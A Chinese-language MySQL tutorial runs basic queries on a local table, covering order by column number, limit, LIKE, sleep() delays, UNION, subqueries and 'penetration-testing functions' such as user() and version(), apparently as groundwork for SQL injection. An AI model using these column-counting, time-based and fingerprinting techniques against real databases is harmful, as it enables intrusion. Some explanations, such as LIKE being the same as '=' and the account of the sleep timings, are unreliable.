1、MySQL的基础查询语句
①排序:知道字段的情况下 select*from 表 order by 字段名;
mysql> select*from bdd;
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select*from bdd order by xh;
+----+--------------+
| xh | xm |
+----+--------------+
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 43 | Hello |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
在不知道字段名的情况下,可以使用order by 1这样的语句;
order by 1指的是第一个字段排序,order by 2指的是第二个字段排序以此类推;
mysql> select*from bdd order by 1;
+----+--------------+
| xh | xm |
+----+--------------+
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 43 | Hello |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select*from bdd order by 2;
+----+--------------+
| xh | xm |
+----+--------------+
| 44 | 0x48656c6c6f |
| 2 | bb |
| 3 | bb |
| 42 | bb |
| 43 | Hello |
| 40 | Hello |
| 41 | Hello |
+----+--------------+
7 rows in set (0.00 sec)
desc倒序 asc正序;
mysql> select*from bdd order by xh desc;
+----+--------------+
| xh | xm |
+----+--------------+
| 44 | 0x48656c6c6f |
| 43 | Hello |
| 42 | bb |
| 41 | Hello |
| 40 | Hello |
| 3 | bb |
| 2 | bb |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select*from bdd order by xh asc;
+----+--------------+
| xh | xm |
+----+--------------+
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 43 | Hello |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
②分页:select * from 表 limit n , m;[注:n表示从第几行开始,m表示取几条]
mysql> select*from bdd;
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select * from bdd limit 0,1;
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
+----+-------+
1 row in set (0.00 sec)
mysql> select*from bdd limit 0,2;
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
| 2 | bb |
+----+-------+
2 rows in set (0.00 sec)
mysql> select*from bdd limit 1,2;
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
+----+------+
2 rows in set (0.00 sec)
mysql> select*from bdd limit 2,2;
+----+-------+
| xh | xm |
+----+-------+
| 3 | bb |
| 40 | Hello |
+----+-------+
2 rows in set (0.00 sec)
③模糊查询:select * from 表 where username like 'like';[注:like和=是一样的意思]
mysql> select * from bdd;
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select * from bdd where xm='bb';
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (0.00 sec)
mysql> select*from bdd where xm like 'bb';
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (0.00 sec)
如果我们要取这张表里面所有含有b字符的东西的话,那就要在前后b的前后都加一个%,例'%b%'
如果要取b开头的,就在b的结尾加一个%,例'b%'
如果是b结尾的,就在b的开头加一个%,例'%b'
mysql> select*from bdd where xm like 'b';
Empty set (0.00 sec)
mysql> select * from bdd where xm like '%b%';
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (0.00 sec)
④运算符号:+、-、*、/、%; [注:运算符中的%指的是取余]
mysql> select 9+1;
+-----+
| 9+1 |
+-----+
| 10 |
+-----+
1 row in set (0.00 sec)
mysql> select 10-1;
+------+
| 10-1 |
+------+
| 9 |
+------+
1 row in set (0.00 sec)
mysql> select 2*2;
+-----+
| 2*2 |
+-----+
| 4 |
+-----+
1 row in set (0.02 sec)
mysql> select 8/2;
+--------+
| 8/2 |
+--------+
| 4.0000 |
+--------+
1 row in set (0.00 sec)
mysql> select 9%4;
+------+
| 9%4 |
+------+
| 1 |
+------+
1 row in set (0.00 sec)
⑤逻辑运算:
AND | & |
OR | I |
NOT | ! |
编程中会进行判断,通常会用True或False来代替,一个是真一个是假;有的时候True和False会用0和1来代替,0代表假,1代表真;
mysql> select * from bdd;
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select * from bdd where xm='bb';
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (0.00 sec)
mysql> select * from bdd where xm ='bb' and xh=42;
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
+----+------+
1 row in set (0.00 sec)
mysql> select * from bdd where xm='bb' && xh=42;
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
+----+------+
1 row in set (0.00 sec)
mysql> select * from bdd where xm='bb' or xh=43;
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+-------+
4 rows in set (0.00 sec)
mysql> select * from bdd where xm='bb' || xh=43;
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+-------+
4 rows in set (0.00 sec)
mysql> select * from bdd where not xm='bb';
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 40 | Hello |
| 41 | Hello |
| 44 | 0x48656c6c6f |
+----+--------------+
4 rows in set (0.00 sec)
mysql> select * from bdd where xm!='bb';
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 40 | Hello |
| 41 | Hello |
| 44 | 0x48656c6c6f |
+----+--------------+
4 rows in set (0.00 sec)
⑥延迟:sleep(秒) AND :执行有选择
在or使用语句当中,如果前面的条件是假的,就不会执行后面的东西;
mysql> select sleep(5);
+----------+
| sleep(5) |
+----------+
| 0 |
+----------+
mysql> select * from bdd where xm ='bb';
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (0.00 sec)
mysql> select * from bdd where xm ='bb' and sleep(2);
Empty set (6.04 sec)//这里的6秒是因为xm字段里面又3条bb,一条2秒所以这里是6秒//
mysql> select * from bdd where xm ='bb' or sleep(1);
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (4.06 sec)
//这里xm字段里的3条bb都执行了3次1秒,执行了3次之后还是会去检查or sleep(1),当xm='bb'这个条件不满足的时候,自己又执行了1次sleep(1),执行之后发现是等于0(假的意思),然后发现这一块没有等于0的东西,所以还是会执行多1秒,就是真的意思//
2、联合查询:union,会将两条语句并在一起输出;
联合查询的字段名是取union前面那个查询的结果的字段名来作为字段名;
mysql> select * from bdd where xh=42;
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
+----+------+
1 row in set (0.00 sec)
mysql> select * from bdd where xh=42 union select 1,2;
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
| 1 | 2 |
+----+------+
2 rows in set (0.01 sec)
联合查询的字段数必须相同;
mysql> select * from bdd where xh=42 union select 1,2,3;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
联合查询里前面的语句与后面的语句查询出来有相等的时候,就只会输出一个;
mysql> select * from bdd where xh=42 union select 42,'bb';
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
+----+------+
1 row in set (0.00 sec)
如果要两个都输出的话,使用union all 语句;
mysql> select * from bdd where xh=42 union all select 42,'bb';
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
| 42 | bb |
+----+------+
2 rows in set (0.00 sec)
3、子查询:子查询是一种常用的计算机语言SELECT—SQL语言中嵌套查询下层的程序模块。当 一个查询是另一个查询的条件时,称之为子查询。
简单理解:子查询就如同1+2*5 (1+2)*2=6,子查询就是优先执行,然后执行得到的结果 作为某个查询的条件。
使用子查询,外面必须要有一个单独属于它自己的括号。
mysql> select * from bdd where xh=43;
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
+----+-------+
1 row in set (0.00 sec)
mysql> select * from bdd where xh=(select 43);//这里优先执行了括号里东西//
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
+----+-------+
1 row in set (0.00 sec)
方便理解的例子:
select * from user where username = (select username from admin where id = 1);
//admin表当id=1的用户名是否在user表也存在//
select * from user where username in (select username from admin);
//检查admin表和user表是否有用户名相等//
4、渗透测试常用函数
①group_concat(col) 返回由属于一组的列值连接组合而成的结果;
mysql> select * from bdd;
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select group_concat(xm) from bdd;
+-----------------------------------------+
| group_concat(xm) |
+-----------------------------------------+
| Hello,bb,bb,Hello,Hello,bb,0x48656c6c6f |
+-----------------------------------------+
② user() 返回当前登录用户名;
mysql> select user();
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
③version() 返回Mysql服务器的版本;
mysql> select version ();
+------------+
| version () |
+------------+
| 5.5.53 |
+------------+
1 row in set (0.00 sec)
5、select * from 表 ;*代表这张表里的所有字段
例:select * from bdd; = select xm,xh from bdd;